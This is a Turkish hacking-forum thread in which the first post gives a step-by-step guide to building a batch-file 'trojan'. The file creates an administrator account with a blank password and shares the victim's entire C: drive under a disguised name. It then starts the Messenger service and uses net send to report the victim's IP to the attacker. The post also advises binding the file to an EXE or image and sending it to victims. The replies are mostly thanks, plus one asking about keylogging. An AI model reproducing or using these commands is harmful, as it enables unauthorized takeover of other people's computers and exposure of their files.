İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

--->not defteri ile trojan yapımı <--

02-05-2013 16:17
#1
pRoducti0n - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
03/2013
Nereden:
Ʈ৸
Yaş:
21
Mesajlar:
1.880
Teşekkür (Etti):
191
Teşekkür (Aldı):
336
Konular:
340
Dökümanı tamamen okursanız size yararı olucagını düşünüyorum...

Evet arkadaslar* konunun başlığından da anlayabileceginiz gibi Anti Virüs programları tarafından tanınmayan tamamen size ait bir truva atı yapmayı size kısaca anlatacağım;

Truva atının ana amacı* adından da anlaşılacağı gibi hedef sisteme sızarak sistemi ele geçirmek ya da bilgi toplamaktır. Dikkat edin zarar vermek demiyorum çünkü bu etik olarak yanlış bir harekettir

Piyasada bu konuda son derece fonksiyonel bircok truva atı var fakat bu truva atlarını kodlayanların hepsi Ticari amac güttükleri icin ki bu konuda da sonuna kadar haklıdırlar* Truva atlarının özel yapım(special edition) olan versiyonlarının dışındaki tüm Public versiyonlari maalesef AV lerce tanınmakta ve hepsinden önemlisi Firewallar tarafindan engellenmektedirler ve bu da kullanıcılarin işini oldukca zorlastırmaktadır.

Size şimdi anlatacağim yöntem* biraz mantık biraz da teknik bilgi gerektirmektedir. Bu ikisinin dışında başka hicbir programa(toola) ihtiyacınız yoktur.

Şimdi Truva atımızı hazırlamaya başlayalım;

1-) Öncelikle bir TXT dosyası açın ve içine şu komutu girin;

net user HACK /add

Bu komut sayesinde kurbanin makinasında "HACK" isminde bir user yarattık. Fakat bu user hesabı normal olarak açıldigi icin hakları da sınırlı olacaktır. Bu nedenle ikinci aşamaya geçiyoruz;

2-) şimdi yukarıdaki komutun hemen bir alt satırına geçin ve şu komutu ekleyin;

net localgroup administrators HACK /add

Böylece "HACK" isimli kullanıcı hesabını* direk yönetici(admin) grubuna kattık. Artık "HACK" hesabımız tüm yetkilere sahip.

3-) Simdi de kurbanımızın makinasındaki C:\\ sürücüsünü sınırsız paylaşıma açacağız. Kurbanı da huylandırmamak için paylaşım adını SYSTEM olarak yapacağız. Bunun için aşağıdaki komutu kullanacağız;

net share system=C:\\ /unlimited

Evet artık Kurbanımızın makinasını sonuna kadar açtık. Peki kurbanın IP sini nereden bileceğiz de kurbanın makinasina bu yarattığımız "HACK" hesabından bağlanacağız?

Bunun için de kodumuza bir satırlık bir komut daha ekleyeceğiz;

4-) NET SEND komutunu kullanarak kurbanın bize Windows’un Messaging Servisi vasıtası ile mesaj atmasını ve IP sını bize söylemesini saglayacağız. Bunun icin aşağıdaki komutu da kodunuzun içerisine ekleyin;

net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbanınım Gel bana baglan

Unutmayın 82. li baslayan IP adresi yerine kendi IP nizi yazin.

4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiğiniz gibi Windows Messenger Servisini kullanan internette ortalıkta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled ’dir. Disabled olursa NET SEND komutu bir işe yaramaz. Iste bu son önlemimizde de bu servisi Disabled tan Automatic moduna set ettirecegiz. Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adını öğreniyoruz. Adi Messenger ’mis. simdi bu adı kullanarak bu servisi çalıstırıyoruz.

net start Messenger

Size tavsiyem* bu son komutu kodunuzun en basina koymaniz. Böylelikle ardışık sırada önce Messenger servisi çalıştırılacak daha sonra diğer işlemler yapılacaktır. Kodun sağlıklı çalışması açısından bu 4. şıkkı ilk sıraya koymanız daha iyi olur.

Son olarak TXT de yazdığınız kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.

Kurbanınız bu dosyayı çalıştırdiğı an makinasında Admin haklarına sahip HACK adında bir user açılacak ve şifresi de blank yani boş olacaktır. C:\\ sürücüsü de full olarak paylasima açilmış olacak ve son olarak da IP si size gelecektir.

YARDIMCI OLDUYSAM TEŞEKKÜR BUTONUNA BASMAN YETERLİ !!

02-05-2013 16:20
#2
cesiceyms - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2013
Mesajlar:
548
Teşekkür (Etti):
132
Teşekkür (Aldı):
77
Konular:
10
emeğine sağlık
Kullanıcı İmzası
Cesiceyms
Fury157 Teşekkür etti.
02-05-2013 16:23
#3
pRoducti0n - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
03/2013
Nereden:
Ʈ৸
Yaş:
21
Mesajlar:
1.880
Teşekkür (Etti):
191
Teşekkür (Aldı):
336
Konular:
340
Alıntı:
cesiceyms´isimli üyeden Alıntı Mesajı göster
emeğine sağlık
Ö.değil Kardeşim
02-05-2013 17:58
#4
beko1640 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2009
Mesajlar:
6
Teşekkür (Etti):
5
Teşekkür (Aldı):
0
Konular:
1
Eline sağlık kardeşim güzel paylaşım olmuş ancak şöyle bir durum var biz bu trojan ile adamın pc ye sızdıktan sonra müdahale edebilıyor muyuz mesela ne biliyim klavye loglarını falan alabiliyor muyuz yoksa sadece ip için mi
02-05-2013 18:06
#5
Üyelik tarihi:
05/2013
Mesajlar:
24
Teşekkür (Etti):
4
Teşekkür (Aldı):
0
Konular:
0
eyw. krdşm
02-05-2013 23:21
#6
ultiny - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2013
Mesajlar:
7
Teşekkür (Etti):
4
Teşekkür (Aldı):
0
Konular:
0
Eline sağlık.güzel paylaşım.
07-05-2013 19:40
#7
Strokxi - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2013
Nereden:
Amerika
Mesajlar:
243
Teşekkür (Etti):
32
Teşekkür (Aldı):
18
Konular:
21
sende .bat haa
07-05-2013 19:51
#8
TimeisOver - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
New York
Mesajlar:
86
Teşekkür (Etti):
7
Teşekkür (Aldı):
8
Konular:
11
birçok kez paylaşıldı bu virüsler.. paylaşmanın bir anlamı kalmadı artık!
Kullanıcı İmzası
@AYD Moderatör TimeisOver
09-05-2013 04:04
#9
ByTETDAX - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Nereden:
adana
Mesajlar:
83
Teşekkür (Etti):
4
Teşekkür (Aldı):
6
Konular:
15
Yapımı Her Ne KAdar Zor Olsada Emeğe Saygı !!!!!
14-07-2013 06:39
#10
DavidSmith - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Mesajlar:
497
Teşekkür (Etti):
58
Teşekkür (Aldı):
20
Konular:
0
ellerine sağlık dostum.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı